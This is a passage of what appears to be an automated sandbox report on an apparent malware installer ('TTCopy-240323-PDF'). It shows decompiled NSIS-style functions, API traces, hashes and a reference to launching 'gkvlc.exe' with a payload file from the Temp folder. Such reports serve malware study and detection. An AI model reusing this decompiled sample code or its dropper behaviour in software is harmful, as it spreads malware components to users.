				return _t27;
			}

















                                                                                            0x004056d0
                                                                                            0x004056da
                                                                                            0x004056df
                                                                                            0x004056e5
                                                                                            0x004056f0
                                                                                            0x004056f3
                                                                                            0x004056f6
                                                                                            0x004056fc
                                                                                            0x004056fc
                                                                                            0x00405702
                                                                                            0x0040570a
                                                                                            0x0040570d
                                                                                            0x0040572a
                                                                                            0x0040572e
                                                                                            0x00405737
                                                                                            0x00405737
                                                                                            0x00405741
                                                                                            0x0040574a
                                                                                            0x00405756
                                                                                            0x0040575d
                                                                                            0x00405761
                                                                                            0x00405764
                                                                                            0x00405777
                                                                                            0x00405785
                                                                                            0x00405785
                                                                                            0x00405789
                                                                                            0x0040578b
                                                                                            0x0040578e
                                                                                            0x00000000
                                                                                            0x0040578e
                                                                                            0x0040570f
                                                                                            0x00405717
                                                                                            0x0040571f
                                                                                            0x00405725
                                                                                            0x00000000
                                                                                            0x00405725
                                                                                            0x0040571f
                                                                                            0x0040570d
                                                                                            0x0040579a

                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                            • lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                            • lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                                            • SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                              • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\gkvlc.exe" C:\Users\user\AppData\Local\Temp\htujbhttw.eyi,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                              • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\gkvlc.exe" C:\Users\user\AppData\Local\Temp\htujbhttw.eyi,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                                            • String ID: ('B
                                                                                            • API String ID: 1495540970-2332581011
                                                                                            • Opcode ID: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                                                            • Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
                                                                                            • Opcode Fuzzy Hash: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                                                            • Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0040462B Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E0040462B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                                                                            0x0040463d
                                                                                            0x004046f3
                                                                                            0x00000000
                                                                                            0x004046f3
                                                                                            0x0040464e
                                                                                            0x00404652
                                                                                            0x00000000
                                                                                            0x0040466c
                                                                                            0x0040466c
                                                                                            0x00404675
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00404677
                                                                                            0x00404683
                                                                                            0x00404686
                                                                                            0x00404686
                                                                                            0x0040468c
                                                                                            0x00404692
                                                                                            0x00404692
                                                                                            0x0040469e
                                                                                            0x004046a4
                                                                                            0x004046ab
                                                                                            0x004046ae
                                                                                            0x004046b1
                                                                                            0x004046b3
                                                                                            0x004046b3
                                                                                            0x004046bb
                                                                                            0x004046c1
                                                                                            0x004046c1
                                                                                            0x004046cb
                                                                                            0x004046d0
                                                                                            0x004046d3
                                                                                            0x004046d8
                                                                                            0x004046db
                                                                                            0x004046db
                                                                                            0x004046eb
                                                                                            0x004046eb
                                                                                            0x00000000
                                                                                            0x004046ee

                                                                                            APIs
                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 00404648
                                                                                            • GetSysColor.USER32(00000000), ref: 00404686
                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00404692
                                                                                            • SetBkMode.GDI32(?,?), ref: 0040469E
                                                                                            • GetSysColor.USER32(?), ref: 004046B1
                                                                                            • SetBkColor.GDI32(?,?), ref: 004046C1
                                                                                            • DeleteObject.GDI32(?), ref: 004046DB
                                                                                            • CreateBrushIndirect.GDI32(?), ref: 004046E5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2320649405-0
                                                                                            • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                            • Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
                                                                                            • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                            • Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 87%
                                                                                            			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E004065C8(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406239( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004061DB( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E004065AF( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}








                                                                                            0x004026ec
                                                                                            0x004026ee
                                                                                            0x004026f1
                                                                                            0x004026f3
                                                                                            0x004026f6
                                                                                            0x004026fb
                                                                                            0x004026ff
                                                                                            0x00402702
                                                                                            0x00402705
                                                                                            0x00402c2a
                                                                                            0x00402c2d
                                                                                            0x0040270b
                                                                                            0x0040270b
                                                                                            0x00402712
                                                                                            0x00402714
                                                                                            0x00402714
                                                                                            0x0040271a
                                                                                            0x0040287e
                                                                                            0x0040287e
                                                                                            0x00402881
                                                                                            0x00402886
                                                                                            0x004015b6
                                                                                            0x0040292e
                                                                                            0x0040292e
                                                                                            0x00000000
                                                                                            0x00402720
                                                                                            0x00402721
                                                                                            0x0040272c
                                                                                            0x0040272f
                                                                                            0x0040273b
                                                                                            0x0040273f
                                                                                            0x004027d7
                                                                                            0x004027ef
                                                                                            0x004027ff
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402745
                                                                                            0x00402745
                                                                                            0x00402748
                                                                                            0x00402749
                                                                                            0x0040274c
                                                                                            0x00402751
                                                                                            0x00402758
                                                                                            0x00402760
                                                                                            0x00000000
                                                                                            0x00402766
                                                                                            0x00402766
                                                                                            0x0040276b
                                                                                            0x00000000
                                                                                            0x00402771
                                                                                            0x00402771
                                                                                            0x00402779
                                                                                            0x0040277c
                                                                                            0x0040277f
                                                                                            0x0040283a
                                                                                            0x00402841
                                                                                            0x00402785
                                                                                            0x0040278b
                                                                                            0x00402797
                                                                                            0x00402801
                                                                                            0x00402801
                                                                                            0x00402799
                                                                                            0x00402799
                                                                                            0x0040279c
                                                                                            0x0040279e
                                                                                            0x0040279e
                                                                                            0x0040279e
                                                                                            0x004027a1
                                                                                            0x004027a6
                                                                                            0x004027a9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004027ab
                                                                                            0x004027ae
                                                                                            0x004027bc
                                                                                            0x004027c2
                                                                                            0x004027d0
                                                                                            0x00000000
                                                                                            0x004027d2
                                                                                            0x00000000
                                                                                            0x004027d2
                                                                                            0x00000000
                                                                                            0x004027d0
                                                                                            0x0040279e
                                                                                            0x00402804
                                                                                            0x00402807
                                                                                            0x00000000
                                                                                            0x00402809
                                                                                            0x0040280e
                                                                                            0x0040284f
                                                                                            0x00402871
                                                                                            0x00402878
                                                                                            0x0040285d
                                                                                            0x0040285d
                                                                                            0x00402860
                                                                                            0x00402863
                                                                                            0x00402866
                                                                                            0x00402866
                                                                                            0x00000000
                                                                                            0x00402817
                                                                                            0x00402817
                                                                                            0x0040281a
                                                                                            0x0040281d
                                                                                            0x00402823
                                                                                            0x00402827
                                                                                            0x0040282a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040282a
                                                                                            0x0040280e
                                                                                            0x00402807
                                                                                            0x0040277f
                                                                                            0x0040276b
                                                                                            0x00402760
                                                                                            0x00000000
                                                                                            0x0040282c
                                                                                            0x0040282c
                                                                                            0x0040282f
                                                                                            0x00402838
                                                                                            0x00000000
                                                                                            0x0040272f
                                                                                            0x0040271a
                                                                                            0x00402c33
                                                                                            0x00402c39

                                                                                            APIs
                                                                                            • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                                              • Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F
                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                            • String ID: 9
                                                                                            • API String ID: 163830602-2366072709
                                                                                            • Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                                                            • Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
                                                                                            • Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                                                            • Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004068EF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 91%
                                                                                            			E004068EF(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405FAE(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405F64(L"*?|<>/\":", _t5))) == 0) {
							E00406113(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                                            0x004068f1
                                                                                            0x004068fa
                                                                                            0x00406911
                                                                                            0x00406911
                                                                                            0x00406918
                                                                                            0x00406924
                                                                                            0x00406924
                                                                                            0x00406927
                                                                                            0x0040692a
                                                                                            0x0040692f
                                                                                            0x00406931
                                                                                            0x0040693a
                                                                                            0x0040693e
                                                                                            0x0040695b
                                                                                            0x00406963
                                                                                            0x00406963
                                                                                            0x00406968
                                                                                            0x0040696a
                                                                                            0x0040696d
                                                                                            0x00406972
                                                                                            0x00406973
                                                                                            0x00406977
                                                                                            0x00406977
                                                                                            0x00406978
                                                                                            0x0040697f
                                                                                            0x00406981
                                                                                            0x00406988
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406990
                                                                                            0x00406996
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406996
                                                                                            0x0040699b

                                                                                            APIs
                                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,746AFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                                                            • CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                                                            • CharNextW.USER32(?,00000000,746AFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                                                            • CharPrevW.USER32(?,?,746AFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: Char$Next$Prev
                                                                                            • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                            • API String ID: 589700163-826357637
                                                                                            • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                                                            • Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
                                                                                            • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                                                            • Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0040302E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E0040302E(intOrPtr _a4) {
				short _v132;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x420efc;
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x420efc = 0;
					return _t15;
				}
				if( *0x420efc != 0) {
					return E00406A71(0);
				}
				_t6 = GetTickCount();
				if(_t6 >  *0x42a26c) {
					if( *0x42a268 == 0) {
						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F93, 0);
						 *0x420efc = _t7;
						return ShowWindow(_t7, 5);
					}
					if(( *0x42a314 & 0x00000001) != 0) {
						wsprintfW( &_v132, L"... %d%%", E00403012());
						return E004056CA(0,  &_v132);
					}
				}
				return _t6;
			}







                                                                                            0x0040303d
                                                                                            0x0040303f
                                                                                            0x00403046
                                                                                            0x00403049
                                                                                            0x00403049
                                                                                            0x0040304f
                                                                                            0x00000000
                                                                                            0x0040304f
                                                                                            0x0040305d
                                                                                            0x00000000
                                                                                            0x00403060
                                                                                            0x00403067
                                                                                            0x00403073
                                                                                            0x0040307b
                                                                                            0x004030b9
                                                                                            0x004030c2
                                                                                            0x00000000
                                                                                            0x004030c7
                                                                                            0x00403084
                                                                                            0x00403095
                                                                                            0x00000000
                                                                                            0x004030a3
                                                                                            0x00403084
                                                                                            0x004030cf

                                                                                            APIs
                                                                                            • DestroyWindow.USER32(?,00000000), ref: 00403049
                                                                                            • GetTickCount.KERNEL32 ref: 00403067
                                                                                            • wsprintfW.USER32 ref: 00403095
                                                                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                              • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                                              • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                            • CreateDialogParamW.USER32 ref: 004030B9
                                                                                            • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                                                                                              • Part of subcall function 00403012: MulDiv.KERNEL32(?,00000064,?), ref: 00403027
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                            • String ID: ... %d%%
                                                                                            • API String ID: 722711167-2449383134
                                                                                            • Opcode ID: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                                                                            • Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
                                                                                            • Opcode Fuzzy Hash: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                                                                            • Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00404F7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00404F7F(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
